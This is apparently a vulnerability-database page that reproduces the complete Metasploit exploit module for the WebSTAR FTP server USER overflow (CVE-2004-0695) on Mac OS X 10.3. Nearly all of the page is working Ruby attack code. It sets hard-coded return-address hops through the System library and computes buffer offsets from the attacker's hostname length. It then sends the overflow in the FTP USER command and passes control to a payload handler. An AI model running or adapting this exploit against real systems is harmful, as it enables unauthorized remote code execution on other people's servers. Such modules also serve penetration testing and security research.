WebSTAR FTP Server USER Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType

This module exploits a stack buffer overflow in the logging routine of the WebSTAR FTP server to obtain reliable code execution through a series of hops in the System library


                                                ##
# $Id: webstar_ftp_user.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;WebSTAR FTP Server USER Overflow&#39;,
			&#39;Description&#39;    =&#62; %q{
					This module exploits a stack buffer overflow in the logging routine
				of the WebSTAR FTP server. Reliable code execution is
				obtained by a series of hops through the System library.
			},
			&#39;Author&#39;         =&#62; [ &#39;ddz&#39;, &#39;hdm&#39; ],
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Version&#39;        =&#62; &#39;$Revision: 10394 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[ &#39;CVE&#39;, &#39;2004-0695&#39;],
					[ &#39;OSVDB&#39;, &#39;7794&#39;],
					[ &#39;BID&#39;, &#39;10720&#39;],

				],
			&#39;Privileged&#39;     =&#62; true,
			&#39;Payload&#39;        =&#62;
				{
					&#39;Space&#39;    =&#62; 300,
					&#39;BadChars&#39; =&#62; &#34;\x00\x20\x0a\x0d&#34;,
					&#39;Compat&#39;   =&#62;
						{
							&#39;ConnectionType&#39; =&#62; &#34;+find&#34;
						},
				},
			&#39;Targets&#39;        =&#62;
				[
					[
						&#39;Mac OS X 10.3.4-10.3.6&#39;,
						{
							&#39;Platform&#39;     =&#62; &#39;osx&#39;,
							&#39;Arch&#39;          =&#62; ARCH_PPC,
							&#39;Rets&#39;          =&#62; [ 0x9008dce0, 0x90034d60, 0x900ca6d8, 0x90023590 ],
						},
					],
				],
			&#39;DisclosureDate&#39; =&#62; &#39;Jul 13 2004&#39;,
			&#39;DefaultTarget&#39; =&#62; 0))

		register_options(
			[
				OptString.new(&#39;MHOST&#39;, [ false, &#34;Our IP address or hostname as the target resolves it&#34; ]),
			], self)
	end

	# crazy dino 5-hop foo
	#$ret = pack(&#39;N&#39;, 0x9008dce0); # call $r28, jump r1+120
	#$r28 = pack(&#39;N&#39;, 0x90034d60); # getgid()
	#$ptr = pack(&#39;N&#39;, 0x900ca6d8); # r3 = r1 + 64, call $r30
	#$r30 = pack(&#39;N&#39;, 0x90023590); # call $r3

	def exploit
		connect

		# The offset to the return address is dependent on the length of our hostname
		# as the target system resolves it ( IP or reverse DNS ).
		mhost = datastore[&#39;MHOST&#39;] || Rex::Socket.source_address(datastore[&#39;RHOST&#39;])
		basel =  285 - mhost.length

		print_status(&#34;Trying target #{target.name}...&#34;)

		#  ret = 296
		# r25  = 260
		# r26  = 264
		# r27  = 268
		# r28  = 272
		# r29  = 276
		# r30  = 280
		# r31  = 284

		# r1+120 = 408

		buf                 = rand_text_alphanumeric(basel + 136 + 56, payload_badchars)
		buf[basel +  24, 4] = [ target[&#39;Rets&#39;][0] ].pack(&#39;N&#39;) # call $r28, jump r1+120
		buf[basel      , 4] = [ target[&#39;Rets&#39;][1] ].pack(&#39;N&#39;) # getgid()
		buf[basel + 136, 4] = [ target[&#39;Rets&#39;][2] ].pack(&#39;N&#39;) # (r1+120) =&#62; r3 = r1 + 64, call $r30
		buf[basel + 120, 4] = [ target[&#39;Rets&#39;][3] ].pack(&#39;N&#39;) # call $r3
		buf &#60;&#60; payload.encoded

		send_cmd( [&#39;USER&#39;, buf] , true )
		send_cmd( [&#39;HELP&#39;] , true )

		handler
		disconnect
	end

end

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1